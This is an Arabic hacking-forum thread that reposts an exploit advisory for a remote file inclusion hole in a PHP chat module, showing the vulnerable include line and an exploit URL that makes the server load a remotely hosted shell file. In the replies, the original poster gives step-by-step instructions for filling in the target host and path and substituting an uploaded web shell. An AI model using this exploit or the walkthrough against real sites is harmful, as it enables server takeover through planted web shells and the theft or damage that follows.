ثغرة جديده من هكر عرعر

[ViRuS Qalaa]

كود PHP:

*# Exploit Title:   php_chat Remote File inclusion Vulnerability  

# Date: 2010/07/20  

# Author: HaCkEr arar  

# Email: [email]y.0@hotmail.de[/email]  

# My Sites : [url]www.vbspiders.com[/url]  

# Script home:  

[url]http://www.opensourcescripts.com/dir/PHP/Chat/php_chat_module_for123_flash_chat_4902.html[/url]  

# Tested on: Windows  

# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM  

# ViRuS Qalaa: [email]em9@live.com[/email]  

:::::::::::::::::::::::::  

=================Exploit=================  

   

-=[ vuln c0de ]=-  

include('db/'.$select_db.'.php');  

login_chat.php  

Line:41  

   

----exploit----  

   

http://{localhost}/{path}login_chat.php?select_db=shell.txt?  

   

---------greatz----------  

Greatz to :  

ViRuS Qalaa,VoLc4n0,Members [url]www.j1q1.com[/url]  

   

and My friends Others and My friends in MSN  

EnJoY o_O* 
_____________________________________________________ 


http://www.exploit-db.com/exploits/14425/

المصدر: :: vBspiders Professional Network ::

---

eyvm []d]i lk i;v uvuv

[BayBi HaCk]

[motr][motr1]بارك الله فيك يا اخ فايروس يشرفني ان اكون اول من يرد عليك[/motr1][/motr]

[z3r0 b0mb3r]

شكرا وبارك الله فيك

[hassn1402]

كيف الاستغلال

[Q2-FOX2R]

مشكووورين حبيبي

بس اعتقد النوع ده من الثغرات قريب ينقرض ههههههه

بسبب الاصدار الجديد للملقم بي آتش بي

[yatta]

اذا ممكن .. كيف طريقة الاستغلال

[ViRuS Qalaa]

[align=center]اخي طريقة الاستغلال كذا
----

كود PHP:

http://{localhost}/{path}/login_chat.php?select_db=shell.txt? 


اولا رابط الموقع نضعة بدل {localhost}
ثانيا المجلد لي فية السكريب نضعة بدل {path} واذا كان السكريب قي الواجة نمسح هذة
ثالثا الملف والدالة هذة

كود PHP:

/login_chat.php?select_db= 


رابعا نضع بدل shell.txt شل مرفوع بصيغة txt
خامسا نضع في الاخر علامة استفهام
وتحياتي لكم [/align]

[hack!n9]

مشكور يا غالي عل تغرة بس ماهو دورك